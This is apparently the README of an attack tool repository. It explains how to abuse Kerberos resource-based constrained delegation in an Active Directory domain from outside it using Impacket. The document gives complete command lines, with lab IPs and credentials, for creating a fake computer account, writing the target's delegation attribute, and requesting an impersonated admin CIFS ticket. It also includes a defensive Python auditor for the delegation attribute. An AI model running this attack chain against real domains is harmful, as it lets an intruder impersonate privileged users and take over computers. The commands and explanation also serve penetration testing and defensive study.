Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket

Abusing Kerberos Resource-Based Constrained Delegation

TL;DR

This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation in a Windows Active Directory Domain.

The difference from other common implementations is that the attack is launched from outside the Windows domain, not from a domain-joined (usually Windows) computer.

The attack is implemented using only Python 3 Impacket (and its dependencies). Tested on Arch with an up-to-date Impacket (0.9.21 at the time of writing).

Attack Log

The Attack

In short, the attack targets a domain computer, more precisely the service principals associated with that target computer.

What we need here as prerequisites:

  • a domain account with write access to the target computer (specifically, write access to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer's domain object)
  • permission to create new computer accounts (this is usually the default, see MachineAccountQuota)
  • LDAP (389/tcp) and SAMR (445/tcp) access to the DC, or alternatively LDAPS (636/tcp)
  • Kerberos (88/tcp) access to the DC

The attack path at a very high level:

  1. Create a fake computer
  2. Abuse msDS-AllowedToActOnBehalfOfOtherIdentity property of the target
  3. Request impersonated Service Tickets (S4U) for the target computer

Benefit:

  • Impersonated Service Tickets may allow high-level access to services on the target such as CIFS, HTTP, etc., if the impersonated account has privileges there; sometimes this means a takeover of the computer.

Common toolsets

The common toolsets for this attack operate on a domain-joined Windows Computer using:

Impacket implementation

This implementation uses pure Impacket from outside the Domain.

Creating the fake computer

Using the addcomputer.py example from Impacket, let's create a fake computer (called evilcomputer):

addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Modifying delegation rights

The rbcd.py script in this repo adds the security descriptor of the newly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.

./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

The script relies heavily on the Python classes of the ntlmrelayx.py Impacket example. For help and an example invocation, call the script without options.
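Since step 2 is the one a defender can audit, here is an added example (not code from this repo or from Impacket) that decodes the binary security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity and lists the SIDs allowed to act on behalf of the computer, flagging any that are not on an expected allow-list. The sample descriptor, the SIDs and the make_sample_sd builder are constructed for offline use; a real value would come from an LDAP read of the computer object or from a directory-change audit event.

```python
import struct

def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...-1105' into the binary SID structure (revision, count, authority, subs)."""
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def sid_from_bytes(data, off):
    """Decode the binary SID at offset off back to its string form."""
    revision, count = struct.unpack_from("<BB", data, off)
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)

def make_sample_sd(allowed_sids):
    """Constructed input only: self-relative SD with one ACCESS_ALLOWED_ACE (GENERIC_ALL) per SID."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", 0x00, 0x00, 8 + len(sid_b), 0x10000000) + sid_b  # type, flags, size, mask
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces  # ACL revision 4 (DS)
    # 20-byte header: revision 1, control SE_DACL_PRESENT|SE_SELF_RELATIVE, DACL right after it
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl

def rbcd_allowed_sids(sd):
    """Return the SIDs of all ACCESS_ALLOWED_ACEs in the descriptor's DACL (the principals allowed to act)."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & 0x0004 or dacl_off == 0:  # no DACL present: nobody is allowed
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    sids, off = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, _mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE_TYPE
            sids.append(sid_from_bytes(sd, off + 8))
        off += ace_size
    return sids

def audit_rbcd(sd, expected_sids):
    """SIDs in the attribute that are not on the allow-list, e.g. a freshly added machine account."""
    return [s for s in rbcd_allowed_sids(sd) if s not in set(expected_sids)]

# Constructed sample: WEB$ legitimately trusts one front-end account; the second entry is unexpected
LEGIT_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
ROGUE_SID = "S-1-5-21-1111111111-2222222222-3333333333-9001"
SAMPLE_SD = make_sample_sd([LEGIT_SID, ROGUE_SID])
```

Running audit_rbcd over every computer object's attribute value, against a list of the delegations you actually provisioned, surfaces the rogue entry that this attack leaves behind.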

Getting the impersonated service ticket

Now everything is ready to abuse the Constrained Delegation via an S4U2Self request and obtain an impersonated Service Ticket for the target computer, using the getST.py Impacket example script:

getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

The above command fetches a CIFS Service Ticket on behalf of the targeted domain user admin and stores it in the file admin.ccache.

After pointing the KRB5CCNAME environment variable at the file, the ticket is usable by Kerberos clients.

export KRB5CCNAME=`pwd`/admin.ccache
klist

References

For details about abusing Resource-Based Constrained Delegation:

And one of the most comprehensive presentations about Kerberos Attacks:
